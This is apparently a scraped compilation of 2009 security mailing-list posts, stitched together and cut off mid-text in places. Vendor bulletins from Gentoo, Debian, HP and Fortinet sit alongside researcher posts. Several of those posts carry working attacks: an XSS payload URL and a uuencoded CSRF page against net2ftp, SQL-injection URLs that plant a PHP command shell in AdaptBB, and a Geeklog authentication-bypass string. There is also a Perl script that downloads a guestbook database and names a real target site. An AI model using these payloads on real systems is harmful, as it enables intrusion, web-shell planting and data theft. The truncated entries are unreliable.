net2ftp = 0.97 Cross-Site Scripting/Request Forgery
#=cicatriz
c1c4t...@voodoo-labs.org=#=(advisories)=#
/) /) /)
_ _ ___(/ // _ (/_ _ _ _
(/__(_)(_)(_(_(_)(_)(/_(_(_/_) /_)_ o (_)/ (_(_/_
.-/
#=net2ftp = 0.97 Cross-Site Scripting/Request
Forgery=#=~~~(_/~=#
#=~~=#
#=Advisory Vulnerability
Information=#=~~~=#
Title: net2ftp = 0.97 Cross-Site Scripting/Request Forgery
Advisory ID: VUDO-2009-0804
Advisory URL: http://research.voodoo-labs.org/advisories/3
Date founded: 2009-04-02
Vendors contacted: net2ftp
Class: Multiple Vulnerabilities
Remotely Exploitable: Yes
Localy Exploitable: No
Exploit/PoC Available: Yes
Policy: Full Disclosure Policy (RFPolicy) v2.0
#=~~=#
#=Tested Vulnerable
packages=#=~~~=#
[+] net2ftp 0.97
[+] net2ftp 0.95
Beta:
[*] net2ftp 0.98 beta
#=~~=#
#=Solutions and
Workarounds=#=~~=#
The vendor didn't released any fix/update.
#=~~=#
#=Technical
Information=#=~~=#
Multiple vulnerabilities were found on the package net2ftp [1], version 0.98
and below. Two types of
vulnerabilities were found: Cross-Site Scripting and Cross-Site Request Forgery.
[*] Cross-Site Scripting (XSS):
This vulnerability it's produced by a typo in the function
validateGeneriInput(), where the
extraction of characters and fails because the regular expression
in charge of the extraction
it's invalid.
+++includes/registerglobals.inc.php @@ 1088:1102
1088 function validateGenericInput($input) {
1089
1090 // --
1091 // Remove the following characters
1092 // --
1093
1094 // Remove XSS code
1095 // $input = RemoveXSS($input);
1096
1097 // Remove
XXX 1098 $input = preg_replace(/]/, , $input);
1099
1100 return $input;
1101
1102 } // end validateGenericInput
---includes/registerglobals.inc.php
This can be easily fixed adding a [ character to the pattern:
+++
$input = preg_replace(/[]/, , $input);
---
[*] Cross-Site Request Forgery (CSRF):
All the forms on the web application are vulnerable because they
doesn't check any type of token to
ensure that the user submited the form. So an attacker can trick the
user to visit a website with this
type of method and perform certain actions on the server, like create
files, delete/rename/upload/etc.
#=~~=#
#=Proof of
Concept=#=~~~=#
[*] Cross-Site Scripting (XSS):
+++
http://ftp.victim.com/?state=login_smallerrormessage=iframe
onload=alert(/voodoo/.source);
---
[*] Cross-Site Request Forgery (CSRF):
With this HTML page an attacker can create a evil PHP script on the
user's server. (uuencoded)
+++
begin 644 attack.html
M/AT;6P^CQB;V1Y/@H)/9OFT@:60](D5D:71;W)M(B!A8W1I;VX](FAT
M='!S.B\O9G1P+G9I8W1I;2YC;VTO:6y...@nAP(B!O;G-U8FUI=#TB(B!M
M971H;V0](G!OW0B/@H)3QI;G!U=!N86UE/2)F='!S97)V97(B('9A;'5E
M/2)V:6-T:6TN9G1PV5R=F5R+F-O;2(@='EP93TB:ED95N(CX*0D\:6YP
M=70@;F%M93TB9G1PV5R=F5R]R=(@=F%L=64](C(Q(B!T7!E/2)H:61D
M96XB/@H)3QI;G!U=!N86UE/2)UV5R;F%M92(@=F%L=64](G9I8W1I;75S
M97)N86UE(B!T7!E/2)H:61D96XB/@H)3QI;G!U=!N86UE/2)L86YG=6%G
M92(@=F%L=64](F5N(B!T7!E/2)H:61D96XB/@H)3QI;G!U=!N86UE/2)S
M:VEN(B!V86QU93TB:6YD:6$B('1Y4](FAI91E;B(^@D)/EN'5T(YA
[ GLSA 200904-11 ] Tor: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200904-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Tor: Multiple vulnerabilities Date: April 08, 2009 Bugs: #250018, #256078, #258833 ID: 200904-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Tor might allow for heap corruption, Denial of Service, escalation of privileges and information disclosure. Background == Tor is an implementation of second generation Onion Routing, a connection-oriented anonymizing communication service. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/tor 0.2.0.34 = 0.2.0.34 Description === * Theo de Raadt reported that the application does not properly drop privileges to the primary groups of the user specified via the User configuration option (CVE-2008-5397). * rovv reported that the ClientDNSRejectInternalAddresses configuration option is not always enforced (CVE-2008-5398). * Ilja van Sprundel reported a heap-corruption vulnerability that might be remotely triggerable on some platforms (CVE-2009-0414). * It has been reported that incomplete IPv4 addresses are treated as valid, violating the specification (CVE-2009-0939). * Three unspecified vulnerabilities have also been reported (CVE-2009-0936, CVE-2009-0937, CVE-2009-0938). Impact == A local attacker could escalate privileges by leveraging unintended supplementary group memberships of the Tor process. A remote attacker could exploit these vulnerabilities to cause a heap corruption with unknown impact and attack vectors, to cause a Denial of Service via CPU consuption or daemon crash, and to weaken anonymity provided by the service. Workaround == There is no known workaround at this time. Resolution == All Tor users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/tor-0.2.0.34 References == [ 1 ] CVE-2008-5397 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397 [ 2 ] CVE-2008-5398 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5398 [ 3 ] CVE-2009-0414 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0414 [ 4 ] CVE-2009-0936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0936 [ 5 ] CVE-2009-0937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0937 [ 6 ] CVE-2009-0938 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0938 [ 7 ] CVE-2009-0939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0939 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200904-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
OpenVAS now beyond 10000 Network Vulnerability Tests
Hello, Passing the 1th Network Vulnerability Test (NVT) is a perfect occasion to report about the progress of the OpenVAS project[1]. In October 2008 the systematic development of new NVTs started with a base of around 5800 Tests. With the release of OpenVAS 2.0 in December 2008, the development was boosted and has now reached an average of 10 code updates per day. The public OpenVAS NVT Feed Service delivers 3-10 new vulnerability tests every day. The significantly grown and globally distributed developer team will gather at the second OpenVAS developers conference[2] July 9-12 2009 in Germany. During the conference features and a roadmap for OpenVAS 3.0 will be scheduled. The OpenVAS project is backed by a number of companies, which also supplement the project with professional services[3]. These companies include Greenbone Networks, SecPod, Intevation and SecuritySpace. Reaching the professional enterprise market is a good indicator that OpenVAS gained maturity very fast says Tim Brown, founder of the OpenVAS project. While OpenVAS 3.0 will likely appear in 2009, users of OpenVAS 1.0 should prepare to migrate as support for 1.0 will end during 2009. Regards, Michael Wiegand [1] http://www.openvas.org [2] http://www.openvas.org/openvas-devcon2.html [3] http://www.openvas.org/professional-services.html -- Michael Wiegand | OpenPGP: D7D049EC | Intevation GmbH - www.intevation.de Neuer Graben 17, 49074 Osnabrück, Germany |AG Osnabrück, HR B 18998 Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner pgplZl96ZqfU8.pgp Description: PGP signature
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta ***
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Multiple Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary SQL
queries.
- [B] Multiple Dynamic Code Execution
[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary php
code.
...
if ($_GET['box']) {
$folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval ( ? .str_replace($cdata, $ddata,
stripslashes(template($view._header))). ?php );
...
- [C] Arbitrary File Upload
[-] Risk: hight
[-] File affected: attach.php
This bug allows a registered user to upload
arbitrary files and to execute them from
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side but only on the client side.
*
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
To execute commands:
http://site/path/rce.php?cmd=uname -a
- [B] Multiple Dynamic Code Execution
http://www.site.com/path/index.php?do=profileuser=blablabox=?php
echo pre; system('ls'); echo /pre?
http://www.site.com/path/index.php?do=messagesuser=blablabox=?php
echo pre; system('ls'); echo /pre?
*
[+] Fix
To fix them you must check the input properly.
However is not recommended to store your real
username and password in the cookies.
*
--
Salvatore drosophila Fresta
CWNP444351
*** Salvatore drosophila Fresta ***
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Multiple Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary SQL
queries.
- [B] Multiple Dynamic Code Execution
[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary php
code.
...
if ($_GET['box']) {
$folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval ( ? .str_replace($cdata, $ddata,
stripslashes(template($view._header))). ?php );
...
- [C] Arbitrary File Upload
[-] Risk: hight
[-] File affected: attach.php
This bug allows a registered user to upload
arbitrary files and to execute them from
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side but only on the client side.
*
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL SELECT
'?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL SELECT
'?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO
FGA-2009-003:EMC RepliStor Buffer Overflow Vulnerability
FGA-2009-003:EMC RepliStor Buffer Overflow Vulnerability 2009.April.08 Summary: Fortinet's FortiGuard Global Security Research Team has discovered a buffer overflow vulnerability in EMC RepliStor. Impact: === Remote code execution. Risk: = Critical Affected Software: == EMC RepliStor 6.2 SP4 and earlier EMC RepliStor 6.3 SP1 and earlier Additional Information: == A remote, unauthenticated user may connect over TCP to the ctrlservice.exe or rep_srv.exe process and send a specially-crafted message to cause a heap based buffer overflow, which can result in arbitrary code execution. Solutions: === The FortiGuard Global Security Research Team released the signature EMC.RepliStor.Integer.Overflow Users should use EMC's Powerlink solution to upgrade to the following EMC RepliStor products: RepliStor 6.2 SP5: Navigate in Powerlink to Home Support Software Downloads and Licensing Downloads P-R RepliStor 6.2 SP5 RepliStor 6.3 SP2: Navigate in Powerlink to Home Support Software Downloads and Licensing Downloads P-R RepliStor 6.3 SP2 Fortinet customers who subscribe to Fortinet’s intrusion prevention (IPS) service should be protected against this buffer overflow vulnerability. Fortinet’s IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle. References: === FortiGuard Advisory: http://www.fortiguardcenter.com/advisory/FGA-2009-13.html EMC Powerlink: powerlink.emc.com CVE ID: CVE-2009-1119 Acknowledgments: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: === Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California. *** This email and any attachments thereto may contain private, confidential, and privileged material for the sole use of the intended recipient. Any review, copying, or distribution of this email (or any attachments thereto) by others is strictly prohibited. If you are not the intended recipient, please contact the sender immediately and permanently delete the original and any copies of this email and any attachments thereto. ***
Geeklog =1.5.2 'SESS_updateSessionTime()' vulnerability
As the vendor stated, see: http://www.geeklog.net/article.php/geeklog-1.5.2sr2 geeklog is also vulnerable to this: http://www.securityfocus.com/bid/34361/info actually this should be renamed in glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
?php
/*
Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/
credit goes to rgod, bug found more than a year ago
working against PHP = 5.0
google dorks: By Geeklog Created this page in +seconds +powered
By Geeklog Created this page in +seconds +powered
inurl:public_html
vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:
...
require_once '../../lib-common.php';
if (PHP_VERSION 5) {
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...
now WS_authenticate() function in /system/lib-webservices.php near lines
780-877:
...
function WS_authenticate()
{
global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;
$uid = '';
$username = '';
$password = '';
$status = -1;
if (isset($_SERVER['PHP_AUTH_USER'])) {
$username = $_SERVER['PHP_AUTH_USER'];
$password = $_SERVER['PHP_AUTH_PW'];
if ($WS_VERBOSE) {
COM_errorLog(WS: Attempting to log in user '$username');
}
} elseif (!empty($_SERVER['REMOTE_USER'])) {
list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
list($username, $password) = explode(':', base64_decode($auth_data));
if ($WS_VERBOSE) {
COM_errorLog(WS: Attempting to log in user '$username' (via
\$_SERVER['REMOTE_USER']));
}
} else {
if ($WS_VERBOSE) {
COM_errorLog(WS: No login given);
}
}
...
and after, near lines 907-909:
...
if (($status == -1) $_CONF['user_login_method']['standard']) {
$status = SEC_authenticate($username, $password, $uid);
}
...
now open /system/lib-security.php near lines 695-717:
...
function SEC_authenticate($username, $password, $uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query(SELECT status, passwd, email, uid FROM
{$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or
(remoteservice = ''))); //--- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) ($nrows == 1)) {
$U = DB_fetchArray($result);
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED) {
// banned, jump to here to save an md5 calc.
return USER_ACCOUNT_DISABLED;
} elseif ($U['passwd'] != SEC_encryptPassword($password)) {
return -1; // failed login
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
return USER_ACCOUNT_AWAITING_APPROVAL;
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
// Awaiting user activation, activate:
DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,
'username', $username);
return USER_ACCOUNT_ACTIVE;
} else {
return $U['status']; // just return their status
}
} else {
$tmp = $LANG01[32] . : ' . $username . ';
COM_errorLog($tmp, 1);
return -1;
}
}
...
you can inject sql code in the 'username' argument of this function, it may
come from $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] php
variables.
Theese vars are used for both HTTP Basic and Digest Authentication methods,
see PHP manual:
http://www.php.net/manual/en/features.http-auth.php
manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php
then type:
username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*
password:
authentication mechanism is bypassed!
Note that it is passed base64_encode()'d !
Now you have access to some dangerous functions:
service_submit_staticpages()
service_delete_staticpages()
service_get_staticpages()
service_getTopicList_staticpages()
in /plugins/staticpages/services.inc.php
service_submit_story()
service_delete_story()
service_get_story()
service_getTopicList_story()
in /system/lib-story.php
ex. the service_submit_staticpages() one allows to specify a dangerous
sp_php flag in submitting staticpages; if the staticapages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
Exjune Guestbook v2 Remote Database Disclosure Exploit
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###
# Vulnerable :
# database path : /admin/exdb.mdb
##
# Real Life Example :
#
#
# OOO OOO OOOOOO
# OO O O O O
# O O O OO OO O OO O OO OOO O
# O O O O O O OOOOOO OO O
# O OO O O O O O O O O OO
# OOO OO O O OOOO OOO OO OO
#
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found Exploited By AlpHaNiX
#
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook//
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved
to c:/db.mdb
##
# Greetz for Zigma/Djek/unary/r1z
use lwp::UserAgent;
system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print [!] Usage : \n./exploit
http://site.com\n;exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]./; } else { $site =
http://.$ARGV[0]./;; }
print \n\n\n\n OOO OOO OOOOOO\n ;
print OO O O O O\n ;
print O O O OO OO O OO O OO OOO O\n ;
print O O O O O O OOOOOO OO O\n ;
print O OO O O O O O O O O OO\n ;
print OOO OO O O OOOO OOO OO OO\n ;
print \n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n;
print [-] Found Exploited By AlpHaNiX \n\n\n;
print [!] Exploiting $site \n;
my $site = $ARGV[0] ;
my $target= $site./admin/exdb.mdb ;
my $useragent = LWP::UserAgent-new();
my $request = $useragent-get($target,:content_file = c:/db.mdb);
if ($request-is_success) {print [+] $site Exploited ! Database saved to
c:/db.mdb;exit();}
else {print [!] Exploiting $site Failed !\n[!]
.$request-status_line.\n;exit();}
[SECURITY] [DSA 1766-1] New krb5 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1766-1secur...@debian.org http://www.debian.org/security/ Nico Golde April 9th, 2009 http://www.debian.org/security/faq - -- Package: krb5 Vulnerability : several Problem type : local/remote Debian-specific: no CVE IDs: CVE-2009-0844, CVE-2009-0845, CVE-2009-0847, CVE-2009-0846 Debian Bug : none Several vulnerabilities have been found in the MIT reference implementation of Kerberos V5, a system for authenticating users and services on a network. The Common Vulnerabilities and Exposures project identified the following problems: The Apple Product Security team discovered that the SPNEGO GSS-API mechanism suffers of a missing bounds check when reading a network input buffer which results in an invalid read crashing the application or possibly leaking information (CVE-2009-0844). Under certain conditions the SPNEGO GSS-API mechanism references a null pointer which crashes the application using the library (CVE-2009-0845). An incorrect length check inside the ASN.1 decoder of the MIT krb5 implementation allows an unauthenticated remote attacker to crash of the kinit or KDC program (CVE-2009-0847). Under certain conditions the the ASN.1 decoder of the MIT krb5 implementation frees an uninitialized pointer which could lead to denial of service and possibly arbitrary code execution (CVE-2009-0846). For the oldstable distribution (etch), this problem has been fixed in version 1.4.4-7etch7. For the stable distribution (lenny), this problem has been fixed in version 1.6.dfsg.4~beta1-5lenny1. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 1.6.dfsg.4~beta1-13. We recommend that you upgrade your krb5 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch7.dsc Size/MD5 checksum: 884 f5b01a80978a9f2a9afd71791db8df78 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch7.diff.gz Size/MD5 checksum: 1589606 75ed739c4c9b5df2541c52c9464baa05 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4.orig.tar.gz Size/MD5 checksum: 11017910 a675e5953bb8a29b5c6eb6f4ab0bb32a Architecture independent packages: http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.4.4-7etch7_all.deb Size/MD5 checksum: 1806494 c00e02b0993697516bb724b56c2974e1 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch7_alpha.deb Size/MD5 checksum:76142 74df50336a1ca446127f29a295444251 http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 216248 343544552ce857d0d0c0de04bc2e54c4 http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 136734 216bdba877619b34b3365f097dc92408 http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 1088500 d38b99163b9ef567ac99d86d594b5535 http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 245770 2ca0a02f0e3c01475c976ea1f60ff0b1 http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 155448 75d7821f443f5fe8c2eba3ddb20e8632 http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 461432 819fed830b782731973509010b1e9167 http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch7_alpha.deb Size/MD5 checksum:92210 d7201b4ea9fe3ce34866244da922cb9e http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch7_alpha.deb Size/MD5 checksum: 1017228 a5d1e1d9ed834070463dcc436a3f9f2b http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch7_alpha.deb Size/MD5 checksum:89400 286af93b67b793dc280045a070dfeb9d
[security bulletin] HPSBMA02396 SSRT080175 rev.1 - HP OpenView Performance Agent and HP Performance Agent Running on Windows, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01622011 Version: 1 HPSBMA02396 SSRT080175 rev.1 - HP OpenView Performance Agent and HP Performance Agent Running on Windows, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2009-04-08 Last Updated: 2009-04-08 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP OpenView Performance Agent and HP Performance Agent. The vulnerability could be exploited remotely to execute arbitrary code. References: CVE-2008-4420, SA21180 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Performance Agent vC.04.60 and HP Performance Agent vC.04.70 and vC.04.72 running on Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-4420 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has provided a hotfix to resolve this vulnerability. Please contact the normal HP Services support channel and request the Performance Agent Hotfix: Migrate away from the 3.0.0.15 version of DynaZip library. PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 8 April 2009 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement. ©Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential
[ GLSA 200904-09 ] MIT Kerberos 5: Multiple vulnerabilities
